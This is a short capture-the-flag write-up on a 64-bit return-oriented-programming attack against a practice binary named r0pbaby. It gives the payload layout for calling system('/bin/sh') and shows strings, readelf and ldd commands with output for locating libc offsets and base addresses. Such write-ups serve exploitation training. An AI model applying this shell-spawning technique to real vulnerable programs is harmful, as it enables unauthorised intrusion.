[buff] + gadget [pop rdi; ret] + [/bin/sh string addr] + [system addr]
Check the offset of the "/bin/sh" string in libc
babyhack@ubuntu:~/tmp$ strings -a -tx /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
17ccdb /bin/sh
Check the offset of the system function in libc
babyhack@ubuntu:~/tmp$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep "system"
223: 000000000012b2c0 70 FUNC GLOBAL DEFAULT 12 svcerr_systemerr@@GLIBC_2.2.5
577: 0000000000046640 45 FUNC GLOBAL DEFAULT 12 __libc_system@@GLIBC_PRIVATE
1337: 0000000000046640 45 FUNC WEAK DEFAULT 12 system@@GLIBC_2.2.5
Check the library base address
babyhack@ubuntu:~/tmp$ ldd ./r0pbaby
linux-vdso.so.1 => (0x00007ffca2aeb000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f2b712e3000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f2b70f1e000)
/lib64/ld-linux-x86-64.so.2 (0x00007f2b716ea000)
Ref. http://crattack.tistory.com/tag/64bit%20ROP